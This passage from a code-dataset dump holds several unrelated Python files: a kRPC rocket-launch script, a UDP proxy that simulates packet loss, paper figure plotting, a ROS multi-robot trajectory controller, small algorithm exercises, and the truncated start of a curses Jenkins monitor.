pause_until_end_of_liquid_fuel(conn)\r\n\r\n\r\ndef first_stage(conn):\r\n    vessel = conn.space_center.active_vessel\r\n\r\n    # point the nose straight up\r\n    vessel.auto_pilot.target_pitch_and_heading(90, 90)\r\n\r\n    # activate the stage\r\n    vessel.control.activate_next_stage()\r\n\r\n    # wait until the fuel runs out\r\n    pause_until_end_of_solid_fuel(conn)\r\n\r\n\r\ndef preparations(conn):\r\n    vessel = conn.space_center.active_vessel\r\n    vessel.auto_pilot.engage()  # prepare the engine\r\n    vessel.control.throttle = 1  # maximum thrust\r\n\r\n    # countdown\r\n    for i in range(4):\r\n        print(4-i)\r\n        time.sleep(1)\r\n\r\n\r\n\r\n\r\nconn = krpc.connect(name='Sub-orbital flight')\r\n\r\nprint(\"Program start\")\r\npreparations(conn)  # countdown and vessel initialization\r\ntime.sleep(0.1)\r\nprint(\"Launch\")\r\nfirst_stage(conn)  # vertical ascent on the first stage\r\ntime.sleep(0.1)\r\nprint(\"First stage decoupled\")\r\nsecond_stage(conn)  # angled ascent\r\ntime.sleep(0.1)\r\nprint(\"Second stage decoupled\")\r\nprint(\"Program ends\")\r\n","repo_name":"DegKir/luna-twenty-six","sub_path":"Smart in sky.py","file_name":"Smart in sky.py","file_ext":"py","file_size_in_byte":2579,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"11389012460","text":"import socket\nimport random\nimport time\n \n\nlocalIP = \"140.118.122.155\"\nlocalPort = 5406\n\n# Create a datagram socket\nUDPProxySocket = socket.socket(family=socket.AF_INET, type=socket.SOCK_DGRAM)\n\n# Bind to address and ip\nUDPProxySocket.bind((localIP, localPort))\n\nprint(\"UDP Proxy up and listening\")\n\n# Listen for incoming datagrams\ndrop_num = 0\ndelay_num = 0\nwhile(True):\n    try: \n        proxyMsg , proxyIP = UDPProxySocket.recvfrom(1024)\n\n        # print(\"Message from Client: \",proxyMsg.decode())\n        # print(\"Client IP Address: \",proxyIP)\n\n        # Drop the received packet with 10% probability if its sequence number i is even.\n        if int(proxyMsg.decode().split(' ')[1]) % 2 == 0:\n            if not random.randint(0,9) == 0:\n                # Sending a msg to server\n                UDPProxySocket.sendto(proxyMsg, (\"140.118.122.155\", 5405))\n            else: \n                print(proxyMsg.decode(),'is dropped')\n                drop_num += 1 \n\n        # Delay the received packet by 100 ms with 5% probability before forwarding it to the server if i is odd.\n        else:\n            if random.randint(0,19) == 0: \n                time.sleep(0.1)\n                delay_num += 1\n                print(proxyMsg.decode(),' is delayed 100 ms ')\n            # Sending a msg to server\n            UDPProxySocket.sendto(proxyMsg, (\"140.118.122.155\", 5405))\n\n        if int(proxyMsg.decode().split(' ')[1]) >= 10000:\n            print('num of drop: ',drop_num)\n            print('num of delay: ',delay_num)\n            break\n        \n    except:\n        # Create a datagram socket\n        UDPProxySocket = socket.socket(family=socket.AF_INET, type=socket.SOCK_DGRAM)\n\n        # Bind to address and ip\n        UDPProxySocket.bind((localIP, localPort))\n\n    \n","repo_name":"hanklin0804/Applications_of_Wireless_Networking_Systems_in_IoT","sub_path":"UDP_socket/loss_and_delay/proxy.py","file_name":"proxy.py","file_ext":"py","file_size_in_byte":1788,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"18859400705","text":"\"\"\"\nThis file contains the code that generates the figures presented in the research paper. 
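Each figure class builds its plot when instantiated.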
\n\"\"\"\nfrom matplotlib import pyplot as plt \nimport matplotlib.ticker as mticker\nimport matplotlib\nfrom matplotlib.colors import LinearSegmentedColormap\nimport numpy as np\nimport os \nimport csv \nimport pandas as pd \nfrom PIL import Image\n\nclass FigResults(): \n def __init__(self): \n \"\"\"\n Assumes the csv file format is as follows: \n Slot ID,LF ,0: void,1: dirt,3: grass,4: tree,5: pole,6: water,7: sky,8: vehicle,9: object,10: asphalt,12: building,15: log,17: person,18: fence,19: bush,23: concrete,27: barrier,31: puddle,33: mud,34: rubble,mIoU,Mean Dice\n 14,FCIoUV2,0.4372,0,0.8386,0.6658,0.0134,0.1818,0.9595,0.2404,0.4096,0.3384,0.0017,0.0052,0.2578,0.229,0.6192,0.7305,0.2451,0.4939,0.2808,0.4372,0.369255,0.9013\n \"\"\"\n \n ###############################################################################################\n # Retrieve Results from file\n ###############################################################################################\n\n results = {} # store all the results data\n # Retrieve the results from the csv file \n with open (\"figures/results.csv\", 'r') as file: \n csvreader = csv.reader(file)\n for i, row in enumerate(csvreader): \n if i == 0: # Get the header row from the data\n header = row\n else: # get the data from the rest of the csv file. ID is ignored\n results[row[1]] = row[2:]\n\n ################################################################################################\n # Plotting the results\n ################################################################################################\n #----- Prep data ------------- #\n # Create a list containing the results\n data = list(results.values())\n # place as numpy array and update the dtype to float instead of string\n data = np.array(data, dtype=float)\n\n # Create the figure \n fig, axs = plt.subplots(1,len(results), dpi=400)\n fig.set_figheight(8)\n fig.set_figwidth(16)\n fig.subplots_adjust(wspace=0, hspace=0)\n fig.suptitle(\"Loss Function Performance Comparison\", va = 'bottom', ha=\"center\",\n fontsize=\"x-large\", fontweight='bold', y= 0.9)\n axs[0].set_ylabel(ylabel=\"IoU Performance Score\")\n\n # All x-values will be centered on 0. 
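(each subplot draws all of its points at one shared x position)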
\n x_val = np.ones(len(data[0]))\n lf = list(results) # obtain a list containing the keys for the results\n maj_id = [2,3,6,14] # id for majority classes within the dataset\n\n for i, d in enumerate(data): \n # Violin plot for the figure\n axs[i].violinplot(d[1:], showmeans=True, )\n # plot the individual points on the violin plot\n axs[i].plot(x_val[1:], d[1:], 'o', color='blue', markersize=4, label=\"Minority Classes\")\n # Replot the majority classes in a different colour \n axs[i].plot(x_val[maj_id], d[maj_id], 'o', color='red', markersize=4, label=\"Majority Classes\")\n axs[i].set(xlim = (0.5,1.5), ylim=(-0.1, 1.1), xticks=([]))\n axs[i].set_xlabel(lf[i])\n axs[i].margins(x=0)\n axs[i].set_yticks(np.arange(0,1.1,0.1))\n axs[i].grid(True)\n \n if i > 0: \n axs[i].set(yticklabels=([])) # remove the yticks for all plots except 1st one\n\n plt.legend()\n\n plt.savefig(\"figures/ResultsPerformanceComparison.svg\")\n #plt.show() \n\nclass FigLossShaping():\n # Plots the function on construction call\n def __init__(self): \n fig = plt.figure(dpi=400)\n \n # Plot the two fuunctions \n x = np.linspace(-0.1, 1.5, 1000) # X-values for the plot\n plt.plot(x, self.f_lossShaping(x), color=\"red\", label=\"Loss Shaping Function\")\n plt.plot(x, self.f_LIoU(x), color=\"blue\", label= \"1 − IoU\")\n plt.grid()\n plt.xticks(np.arange(0,1.1,0.1))\n plt.xlim(-0.05,1.05)\n plt.ylim(-0.05,1.3)\n plt.legend()\n # plt.tight_layout()\n ax = fig.get_axes()[0]\n ax.set_xlabel(\"Class IoU Score\")\n ax.set_ylabel(\"Class Generated Error\")\n ax.margins(x=0,y=0)\n\n\n plt.savefig(\"figures/LossShapingFunction.svg\")\n #plt.show()\n\n def f_lossShaping(self, x): # Loss shaping function base implementation \n return -np.log10(pow(x,0.5))\n def f_LIoU(self, x):# IoU-loss base implementation\n return 1-x \n\nclass FigPowerTerm(): \n def __init__(self): \n fig = plt.figure(dpi=400)\n x = np.linspace(-0.1,1.5,1000)\n plt.plot(x, self.f_powerJaccard(x), color=\"red\", label=\"Power Term\")\n plt.plot(x, self.f_IoU(x), color=\"blue\", label=\"IoU\")\n plt.grid()\n plt.xticks(np.arange(0,1.1,0.1))\n plt.xlim(-0.05,1.05)\n plt.ylim(-0.05,1.05)\n plt.legend()\n # plt.tight_layout()\n ax = fig.get_axes()[0]\n ax.set_xlabel(\"Pixel Prediction Probability\")\n ax.set_ylabel(\"Generated Score\")\n\n\n\n plt.savefig(\"figures/PowerTermFunction.svg\")\n #plt.show()\n \n def f_powerJaccard(self, x): \n return x/(pow(x,2) + 1 - x)\n \n def f_IoU(self, x): \n return x/(x + 1 - x) # IoU score (same as 1/x)\n\nclass FigDBDistribution(): \n def __init__(self, fpath=\"\", class_labels={}, ignore=[], colors=None): \n \n with open (\"figures/distributions.csv\", 'r') as file: \n csvreader = csv.reader(file)\n for i, row in enumerate(csvreader):\n\n if i == 1: \n class_labels = np.array(row)\n elif i == 2: \n distribution = np.array(row)\n # Format the csv values into an array of floats\n distribution = np.char.strip(distribution)\n distribution.astype(\"float\")\n\n # Convert the csv file and prep the data\n df = pd.DataFrame({\"class_labels\": class_labels, \"distribution\": distribution, \"colors\": colors})\n df = df.astype({\"class_labels\": \"string\", \"distribution\": \"float\"})\n df = df.sort_values(by=\"distribution\", ascending=False) # sort the values based on size\n df_lower = df[6:] # Get the lowest values to display them on a separate plot\n\n plt.rcParams.update({\"font.size\":11.5})\n # Plot the figure \n fig, main = plt.subplots(dpi=400)\n plt.xticks(rotation=75)\n \n fig.set_figheight(6)\n fig.set_figwidth(10)\n # Add 
the subplot axes \n sub = fig.add_axes([0.35,0.3, 0.6, 0.6])\n plt.xticks(rotation=75)\n \n if colors == None: \n main.bar(df[\"class_labels\"], df[\"distribution\"])\n sub.bar(df_lower[\"class_labels\"], df_lower[\"distribution\"])\n else: \n # Normalize the range to fit requirements for plotting\n df.colors = np.asarray(df.colors)\n for i,color in enumerate(df.colors): \n df[\"colors\"][i] = np.divide(df[\"colors\"][i], 255.0)\n df.colors[i] = np.around(df.colors[i],2)\n\n # Plot the main plot and subplot \n main.bar(df[\"class_labels\"], df[\"distribution\"], color=df.colors)\n sub.bar(df_lower[\"class_labels\"], df_lower[\"distribution\"], color=df.colors[6:])\n\n # Figure formatting\n main.margins(x=0)\n sub.margins(x=0)\n main.set_ylabel(\"Number of Pixels\")\n plt.tight_layout()\n\n # Update formatting to use literature scientific notation\n f = mticker.ScalarFormatter(useOffset=False, useMathText=True)\n sub.yaxis.set_major_formatter(f)\n main.yaxis.set_major_formatter(f)\n\n plt.savefig(\"figures/rellis3dDistribution.svg\")\n # plt.show() # display the results\n\n\nclass QualitativeResults(): \n \"\"\"\n QualitativeResults()\\n\n --------------------------------------\\n\n A single image is being displayed alongside all the other segmentation predictions obtained for all loss functions. \\n\n Used to qualitatively represent the performance of each loss functions \\n\n \"\"\"\n def __init__(self): \n from matplotlib.figure import SubplotParams\n\n fig, axs = plt.subplots(2,6, tight_layout=True, dpi=400)\n fig.set_figheight(4)\n fig.set_figwidth(16)\n #Save description to make overall formatting a lot easier \n desc = {\n \"base_img\": \"Base Image\",\n \"ann\": \"Ground-Truth Annotations\",\n \"014\": \"FCIoUV2\",\n \"018\": \"Cross Entropy Loss\",\n \"019\": \"Jaccard (IoU) Loss\",\n \"020\": \"Dice Loss\",\n \"021\": \"Focal Loss\",\n \"023\": \"DiceFocal\",\n \"025\": \"FCIoUV1\",\n \"026\": \"Tversky Loss\",\n \"032\": \"Power Jaccard\",\n \"033\": \"DiceTopk\", \n }\n \n desc_names = list(desc.keys())\n lfnames = list(desc.values())\n i = 0\n for r, _ in enumerate(axs): \n for c, _ in enumerate(axs[r]):\n axs[r,c].imshow(Image.open(\"figures/QualitativeResults/{}.png\".format(desc_names[i])))\n axs[r,c].set_xlabel(lfnames[i])\n # Remove xticks and yticks alltogether \n axs[r,c].set_xticks([])\n axs[r,c].set_yticks([])\n axs[r,c].margins(x = 0,y = 0)\n\n i += 1 # increment the counter\n \n # Update the subplot format\n fig.subplots_adjust(wspace=0, hspace=0)\n plt.savefig(\"figures/QualitativeResults.svg\", dpi=400)\n #plt.show()\n pass\n\nclass FigPredictionCertainty(): \n def __init__(self, pred, pred_map, ann, class_labels=[], color_map = None): \n # Remove the batching wrapper -> only use one of the image (if >1 present)\n pred = pred[0].cpu()\n ann = ann[0]\n\n # Convert the labels into a list\n class_labels = list(class_labels.values())\n class_labels = class_labels[1:] # remove the void class since it is the same as the dirt class\n\n # Configure the n# of rows and cols in the figure\n rows, cols = 4, 5\n fig = plt.figure(tight_layout = True, dpi = 300) # TODO -> Update to create a slot for each class.\n gs = fig.add_gridspec(nrows=rows, ncols=cols, wspace= 0.00, hspace = 0.4)\n\n # # place the annotation map on the figure. 
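(both maps are drawn in grayscale)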
\n # if color_map is None: \n # annotation map image\n ax = fig.add_subplot(gs[0,0])\n ax.imshow(ann.cpu(), cmap=\"gray\")\n ax.set_xticks([])\n ax.set_yticks([]) \n ax.set_xlabel(\"Ann Map\", fontsize = \"xx-small\", va=\"top\") \n # Prediction output map\n ax = fig.add_subplot(gs[0,1])\n ax.imshow(pred_map.cpu()[0], cmap=\"gray\")\n ax.set_xticks([])\n ax.set_yticks([]) \n ax.set_xlabel(\"Pred Map\", fontsize = \"xx-small\", va=\"top\") \n\n\n i = 0\n for row in range(rows): \n for col in range(cols):\n\n # Start on the 2nd plot for the first cycle only\n if col < 2 and row == 0: \n col = col + 1 \n else: # ONly complete in the next slots\n ax = fig.add_subplot(gs[row,col]) # add the new subplot to the figure\n\n # r,g,b = self.__conv_color_map(color_map[i]) # rgb colours\n # cdict ={\n # 'red':((0,1,r), (1,r,r)),\n # 'green':((0,1,g), (1,g,g)),\n # 'blue':((0,b,b), (1,b,b)),\n # }\n # cmap = LinearSegmentedColormap(class_labels[i], cdict, N = 256)\n\n ax.imshow(1 - pred[i], cmap = \"gray\")\n ax.set_xticks([])\n ax.set_yticks([])\n ax.set_xlabel(\"{}: {}\".format(i, class_labels[i]), fontsize = \"xx-small\", va=\"top\") # Add labels for each class\n ax.margins(x = 0)\n\n\n i = i + 1 # increase the index for pred\n if i > 18: \n break\n\n\n ax = plt.gca()\n ax.set_xticklabels([])\n ax.set_yticklabels([])\n \n # # Create a figure for each class \n # for c in pred:\n \n plt.show()\n\n def __dispfunc(self, pred): \n \"\"\"This function is applied to the logit output prediction from the model to display the desired output \n The function will depend on which relationship we want to investigate in the figure. \n\n :param pred: Prediction (logit) output from the model\n :type pred: torch.tensor\n :return: Updated tensor for desired format\n :rtype: torch.tensor\n \"\"\" \n return 1 - pred\n\n def __conv_color_map(self,color): \n return (color[0]/255.0, color[1]/255.0, color[2]/255.0)\n\nif __name__ == \"__main__\": \n\n # FigLossShaping()\n # FigPowerTerm()\n\n class_labels = {\n 0: \"void\",\n 1: \"dirt\",\n 2: \"grass\",\n 3: \"tree\",\n 4: \"pole\",\n 5: \"water\",\n 6: \"sky\",\n 7: \"vehicle\",\n 8: \"object\",\n 9: \"asphalt\",\n 10: \"building\",\n 11: \"log\",\n 12: \"person\",\n 13: \"fence\",\n 14: \"bush\",\n 15: \"concrete\",\n 16: \"barrier\",\n 17: \"puddle\",\n 18: \"mud\",\n 19: \"rubble\",\n }\n\n # # Add to path to allow access to the dataloader\n import sys\n import os\n sys.path.append(os.getcwd())\n import dataloader \n db = dataloader.DataLoader()\n colors = db.get_colors(remap_labels=True)\n\n\n # FigResults()\n # FigLossShaping()\n # FigPowerTerm()\n FigDBDistribution(fpath=\"figures/distributions.csv\", class_labels=class_labels, ignore=[0,1], colors=colors[1:])\n # QualitativeResults()\n","repo_name":"jonathanplangger/VBTC","sub_path":"figures/figures.py","file_name":"figures.py","file_ext":"py","file_size_in_byte":14000,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"42817291281","text":"#! 
/usr/bin/env python3\n\nimport rospy\nimport tf\nfrom tf import transformations\nfrom mypath import MyTrajectory\nfrom nav_msgs.msg import Path\nimport math\nfrom geometry_msgs.msg import Twist, PoseWithCovarianceStamped, Pose\nfrom cartesian_controller import cartesian_controller\nfrom sensor_msgs.msg import JointState\nfrom nav_msgs.msg import Odometry\nfrom match_lib.match_robots import MirNav2Goal\n\n\n\nclass execute_trajectories_node():\n\n def __init__(self):\n rospy.init_node(\"lyapunov_controller_node\")\n rospy.loginfo(\"lyapunov controller running\")\n rospy.set_param(\"/mir_initialized\",False)\n self.config()\n \n\n\n\n\n def run(self):\n rospy.loginfo(f\"waiting for trajecories{len(self.target_trajectories)}\")\n while len(self.target_trajectories) != self.number_of_robots and not rospy.is_shutdown():\n rospy.sleep(0.1)\n \n rospy.loginfo(\"all trajecories received\")\n rate = rospy.Rate(self.control_rate)\n idx = 0\n\n # Move to initial pose\n # Because first goal of trajectory is not reached by cartesain formation controller\n mir=MirNav2Goal(\"/mur216\")\n first_pose = Pose()\n first_pose.position.x = self.target_trajectories[0].x[0]\n first_pose.position.y = self.target_trajectories[0].y[0]\n first_pose.orientation.w = 1.0\n mir.sendGoalPos(first_pose)\n while not rospy.is_shutdown():\n res = mir.is_ready()\n if res:\n break\n rospy.sleep(0.5)\n rospy.logdebug(\"MiR at goal\")\n\n # Move to initial pose Via formation controller\n for index in range(0,1): # warum?\n \n # Turn towards the initial pose\n rospy.loginfo(\"turning towards initial pose\")\n correct_orientation = 0\n while not rospy.is_shutdown() and (correct_orientation < self.number_of_robots):\n for i in range(0,self.number_of_robots):\n act_pose = self.robot_poses[i]\n set_pose_x = self.target_trajectories[i].x[0]\n set_pose_y = self.target_trajectories[i].y[0]\n phi_actual = transformations.euler_from_quaternion([act_pose.orientation.x,act_pose.orientation.y,act_pose.orientation.z,act_pose.orientation.w])\n phi_target = math.atan2(set_pose_y-act_pose.position.y,set_pose_x-act_pose.position.x)\n e_phi = phi_target - phi_actual[2]\n \n\n if e_phi > math.pi:\n e_phi = e_phi - 2*math.pi\n elif e_phi < -math.pi:\n e_phi = e_phi + 2*math.pi\n self.robot_command.angular.z = self.K_phi * e_phi\n if abs(self.robot_command.angular.z) > self.limit_w:\n self.robot_command.angular.z = self.robot_command.angular.z / abs(self.robot_command.angular.z) * self.limit_w\n if abs(e_phi) < self.target_threshhold_angular:\n self.robot_command.angular.z = 0\n correct_orientation += 1\n self.cmd_vel_publishers[i].publish(self.robot_command)\n\n rate.sleep()\n\n # move linear to the initial pose\n rospy.loginfo(\"moving to initial pose\")\n correct_distance = 0\n while not rospy.is_shutdown() and correct_distance < self.number_of_robots:\n for i in range(0,self.number_of_robots):\n act_pose = self.robot_poses[i]\n set_pose_x = self.target_trajectories[i].x[0]\n set_pose_y = self.target_trajectories[i].y[0]\n e_d = math.sqrt((set_pose_x-act_pose.position.x)**2 + (set_pose_y-act_pose.position.y) **2 )\n\n self.robot_command.linear.x = self.K_d * e_d\n if abs(self.robot_command.linear.x) > self.limit_x:\n self.robot_command.linear.x = self.robot_command.linear.x / abs(self.robot_command.linear.x) * self.limit_x\n if abs(e_d) < self.target_threshhold_linear: # TODO: dangerous if localization is not good\n self.robot_command.linear.x = 0\n correct_distance += 1\n self.cmd_vel_publishers[i].publish(self.robot_command)\n\n rate.sleep()\n\n 
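# Halve the thresholds so the final orientation pass below is tighter.\n            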
self.target_threshhold_angular *= 0.5\n self.target_threshhold_linear *= 0.5\n \n # set correct orientation\n rospy.loginfo(\"setting correct orientation\")\n correct_orientation = 0\n while not rospy.is_shutdown() and correct_orientation < self.number_of_robots:\n for i in range(0,self.number_of_robots) :\n act_pose = self.robot_poses[i]\n phi_actual = transformations.euler_from_quaternion([act_pose.orientation.x,act_pose.orientation.y,act_pose.orientation.z,act_pose.orientation.w])\n phi_target = self.target_trajectories[i].phi[0]\n e_phi = phi_target - phi_actual[2]\n if e_phi > math.pi:\n e_phi = e_phi - 2*math.pi\n elif e_phi < -math.pi:\n e_phi = e_phi + 2*math.pi\n self.robot_command.angular.z = self.K_phi * e_phi\n if abs(self.robot_command.angular.z) > self.limit_w:\n self.robot_command.angular.z = self.robot_command.angular.z / abs(self.robot_command.angular.z) * self.limit_w\n if abs(e_phi) < self.target_threshhold_angular:\n self.robot_command.angular.z = 0\n correct_orientation += 1\n self.cmd_vel_publishers[i].publish(self.robot_command)\n \n #rospy.logdebug(e_phi)\n\n rospy.set_param(\"/mir_initialized\",True)\n rospy.loginfo(\"MiR initialized\")\n\n ### wait for UR to continue ###\n ur_request = False\n rate = rospy.Rate(1)\n while not rospy.is_shutdown() and ur_request == False:\n ur_request = rospy.get_param(\"/ur_initialized\", False)\n if ur_request == True:\n rospy.loginfo(\"UR initialized\")\n else: \n #rospy.loginfo(\"Waiting for UR to be initialized...\")\n pass\n rate.sleep()\n \n \n #### Main loop ##### \n rate = rospy.Rate(self.control_rate)\n \n while not rospy.is_shutdown() and idx < len(self.target_trajectories[0].v):\n w_filtered = 0.0\n v_filtered = 0.0\n for i in range(0,self.number_of_robots):\n act_pose = self.robot_poses[i]\n set_pose_x = self.target_trajectories[i].x[idx]\n set_pose_y = self.target_trajectories[i].y[idx]\n set_pose_phi = self.target_trajectories[i].phi[idx]\n w_target = self.target_trajectories[i].w[idx] * self.control_rate\n v_target = self.target_trajectories[i].v[idx] * self.control_rate\n v_filtered = v_filtered * (1-self.filter_const_vel) + v_target * self.filter_const_vel\n w_filtered = w_filtered * (1-self.filter_const) + w_target * self.filter_const \n u_v, u_w = cartesian_controller(act_pose,set_pose_x,set_pose_y,w_filtered,v_target,set_pose_phi)\n\n self.robot_command.linear.x = u_v\n self.robot_command.angular.z = u_w\n self.cmd_vel_publishers[i].publish(self.robot_command)\n self.target_pose_broadcaster([set_pose_x,set_pose_y,set_pose_phi],i)\n self.actual_pose_broadcaster(act_pose,i)\n\n idx += 1\n rate.sleep()\n\n def trajectory_cb(self,Path,robot_index):\n trajectory = MyTrajectory()\n trajectory.x = []\n trajectory.y = []\n trajectory.phi = []\n path_len = len(Path.poses)\n for i in range(0,path_len-1):\n trajectory.x.append(Path.poses[i].pose.position.x)\n trajectory.y.append(Path.poses[i].pose.position.y)\n phi = math.atan2(Path.poses[i+1].pose.position.y-Path.poses[i].pose.position.y,Path.poses[i+1].pose.position.x-Path.poses[i].pose.position.x)\n trajectory.phi.append(phi)\n \n trajectory.v = [0.0]\n trajectory.w = [0.0]\n for i in range(1,path_len-2):\n trajectory.v.append(math.sqrt((trajectory.x[i+1]-trajectory.x[i])**2 + (trajectory.y[i+1]-trajectory.y[i])**2 ))\n trajectory.w.append(trajectory.phi[i+1]-trajectory.phi[i])\n\n self.target_trajectories.append(trajectory)\n\n\n def robot_pose_cb(self,msg=PoseWithCovarianceStamped(),robot_index=0):\n self.robot_poses[robot_index] = msg.pose.pose\n\n\n def 
target_pose_broadcaster(self,target_pose,robot_id):\n frame_id = \"robot\" + str(robot_id) + \"/target_pose\"\n self.pose_broadcaster.sendTransform((target_pose[0], target_pose[1], 0),\n tf.transformations.quaternion_from_euler(0, 0, target_pose[2]),\n rospy.Time.now(), frame_id, \"map\")\n\n def actual_pose_broadcaster(self,actual_pose,robot_id):\n frame_id = \"robot\" + str(robot_id) + \"/actual_pose\"\n self.pose_broadcaster.sendTransform((actual_pose.position.x, actual_pose.position.y, 0),\n (actual_pose.orientation.x,actual_pose.orientation.y,actual_pose.orientation.z,actual_pose.orientation.w),\n rospy.Time.now(), frame_id, \"map\")\n \n def joint_states_cb(self, data):\n self.ur_base_angle = data.position[2]\n\n def config(self):\n rospy.Subscriber(\"joint_states\", JointState, self.joint_states_cb)\n self.number_of_robots = rospy.get_param(\"~number_of_robots\")\n self.control_rate = rospy.get_param(\"~control_rate\")\n self.target_trajectories = []\n self.robot_poses = []\n self.cmd_vel_publishers = []\n self.robot_command = Twist()\n self.pose_broadcaster = tf.TransformBroadcaster()\n self.K_phi = 0.6\n self.K_d = 0.7\n self.limit_w = 0.3\n self.limit_x = 0.1\n self.target_threshhold_angular = 0.06\n self.target_threshhold_linear = 0.15\n self.filter_const = 0.1\n self.filter_const_vel = 1.0\n self.multiplicator = 1.0\n\n for i in range(0,self.number_of_robots):\n param = \"~robot\" + str(i) + \"_trajectory_topic\"\n robotX_trajectory_topic = rospy.get_param(param)\n rospy.Subscriber(robotX_trajectory_topic, Path, self.trajectory_cb, i)\n\n param = \"~robot\" + str(i) + \"_pose_topic\"\n robotX_pose_topic = rospy.get_param(param)\n self.robot_poses.append(Pose())\n rospy.Subscriber(robotX_pose_topic, Odometry, self.robot_pose_cb, i)\n\n param = \"~robot\" + str(i) + \"_cmd_vel_topic\"\n topic = rospy.get_param(param)\n self.cmd_vel_publishers.append(rospy.Publisher(topic,Twist,queue_size=5))\n\n \n\n\n\nif __name__==\"__main__\":\n exe = execute_trajectories_node()\n exe.run()\n","repo_name":"pumablattlaus/mur_sb","sub_path":"control/formation_controller/execute_trajectories_dynamic.py","file_name":"execute_trajectories_dynamic.py","file_ext":"py","file_size_in_byte":11349,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"70470788054","text":"'''\n#bisect 이용\nimport sys\nimport bisect\ninput = sys.stdin.readline\nn, x = map(int,input().split())\nnumbers = list(map(int,input().split()))\nleft = bisect.bisect_left(numbers,x)\nright = bisect.bisect_right(numbers,x)\nresult = right - left\nif result:\n print(result)\nelse:\n print(-1)\n'''\nimport sys\ninput = sys.stdin.readline\nn, x = map(int,input().split())\nnumbers = list(map(int,input().split()))\ndef first(array, target, start, end):\n if start > end:\n return None\n mid = (start + end) // 2\n if (mid == 0 or target > array[mid - 1]) and array[mid] == target:\n return mid\n elif target <= array[mid]:\n return first(array, target, start, mid - 1)\n elif target > array[mid]:\n return first(array, target, mid + 1, end)\n\ndef last(array, target, start, end):\n if start > end:\n return None\n mid = (start + end) // 2\n if (mid == n - 1 or target < array[mid + 1]) and array[mid] == target:\n return mid\n elif target >= array[mid]:\n return last(array, target, mid + 1, end)\n elif target < array[mid]:\n return last(array, target, start, mid - 1)\na = first(numbers, x, 0, n-1)\nb = last(numbers, x, 0, n-1)\nif not a :\n print(-1)\nelse:\n print(b - a 
+1)","repo_name":"engks4619/CodingTestPractice","sub_path":"이것이 코딩 테스트다/유형별 기출문제/이진탐색_정렬된 배열에서 특정 수의 개수 구하기.py","file_name":"이진탐색_정렬된 배열에서 특정 수의 개수 구하기.py","file_ext":"py","file_size_in_byte":1237,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"20619631861","text":"class ConferePGM:\n\n    def carrega(self, path):\n        # Use a context manager so the file is actually closed;\n        # the original close() sat after the return and never ran.\n        with open(path, \"rt\") as _entrada:\n            dados = _entrada.read().splitlines()\n        return dados\n\n    def comparaLista(self, lista1, lista2):\n        for dado in lista2:\n            if dado[26:36] in lista1:\n                print(dado)\n\ndef main():\n\n    confere = ConferePGM()\n    lista_pagos = confere.carrega(\"pagosPGM_distribuidorMai2018.txt\")\n    lista_problema = confere.carrega(\"07.txt\")\n    confere.comparaLista(lista_pagos, lista_problema)\n\nif __name__ == \"__main__\":\n    main()","repo_name":"alanprot7/PythonCartorio","sub_path":"confere_pgm_pg.py","file_name":"confere_pgm_pg.py","file_ext":"py","file_size_in_byte":564,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"750344908","text":"# 1476 Date calculation\r\n# A problem I solved in C++ three years ago\r\n\r\nE, S, M = map(int, input().split())\r\n\r\nresult = 0\r\nyear = 1\r\n\r\nwhile True:\r\n    if (year-E) % 15 == 0 and (year-S) % 28 == 0 and (year-M) % 19 == 0:\r\n        result = year\r\n        break\r\n    else:\r\n        year+=1\r\n\r\nprint(year)","repo_name":"rootachieve/Algorithm-study","sub_path":"week16/@HyeonDKIM/1476.py","file_name":"1476.py","file_ext":"py","file_size_in_byte":291,"program_lang":"python","lang":"ko","doc_type":"code","stars":2,"dataset":"github-code","pt":"67"} +{"seq_id":"37057586948","text":"#! /usr/bin/env python\n\n# Jenkins monitor in terminal based on the curses library\n# Author: Marius Herring\n\nimport curses\nimport base64\nimport sys\nimport time\nimport traceback\nimport argparse\n\nif (sys.version_info > (3,0)):\n\tfrom urllib.request import urlopen\n\tfrom urllib.request import Request\nelse:\n\tfrom urllib2 import urlopen\n\tfrom urllib2 import Request\n\ndef createHeader():\n\n\theader = \"Curses Jenkins\"\n\theaderPos = (x/2) - 7\n\n\tif (sys.version_info > (3,0)):\n\t\theaderPos = round(headerPos)\n\n\n\tmyscreen.addstr(0, headerPos, header,curses.color_pair(1))\n\ndef noticeInteractiveMode(focusRow):\n\n\twidth = x-2\n\tif (sys.version_info > (3,0)):\n\t\twidth = round(width)\n\n\tif focusRow == -1:\n\t\tmyscreen.addstr(1, 1, \" \" * width, curses.color_pair(1))\n\telse:\n\t\theaderPos = (x/2) - 8\n\t\tif (sys.version_info > (3,0)):\n\t\t\theaderPos = round(headerPos)\n\n\t\tmyscreen.addstr(1, 1, \" \" * width, curses.color_pair(7))\n\t\tmyscreen.addstr(1, headerPos, \"Interactive mode\",curses.color_pair(7))\n\n\ndef init():\n\n\tglobal myscreen, x, y, links\n\n\tparseArgs()\n\n\tmyscreen = curses.initscr()\n\tmyscreen.border(0)\n\tcurses.curs_set(0)\n\tcurses.noecho()\n\n\tlinks = {}\n\n\ty,x = myscreen.getmaxyx()\n\n\tdefineColors()\n\n\ndef parseArgs():\n\tglobal args\n\tparser = argparse.ArgumentParser(prog='CJenkins')\n\tparser.add_argument('-u', nargs='?', help='username')\n\tparser.add_argument('-p', nargs='?', help='password')\n\tparser.add_argument('-l', nargs='*', help='links', required=True)\n\targs = parser.parse_args()\n\ndef defineColors():\n\n\tcurses.start_color()\n\tcurses.init_pair(1, curses.COLOR_WHITE, curses.COLOR_BLACK)\n\tcurses.init_pair(2, curses.COLOR_GREEN, curses.COLOR_BLACK)\n\tcurses.init_pair(3, curses.COLOR_MAGENTA, curses.COLOR_BLACK)\n\tcurses.init_pair(4, curses.COLOR_CYAN, 
